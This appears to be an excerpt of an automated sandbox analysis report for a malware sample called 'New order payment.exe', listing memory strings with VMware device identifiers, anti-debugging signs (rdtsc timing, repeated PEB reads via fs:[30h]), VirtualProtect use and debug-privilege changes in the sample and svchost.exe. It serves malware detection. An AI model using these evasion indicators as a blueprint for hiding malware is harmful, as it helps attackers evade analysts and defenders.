          Source: explorer.exe, 00000004.00000000.247577904.00000000011B3000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%%
          Source: explorer.exe, 00000004.00000000.274875851.000000000DC2B000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}))
          Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.249068214.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.254567298.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.257414229.000000000DC67000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Shell\M22
          Source: explorer.exe, 00000004.00000000.288676486.000000000DC2B000.00000004.00000001.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&96
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_73223070 sclag,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\New order payment.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732254DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_7322581C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_7322579F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732256EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732257DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00998A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00991B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00991B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009ADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
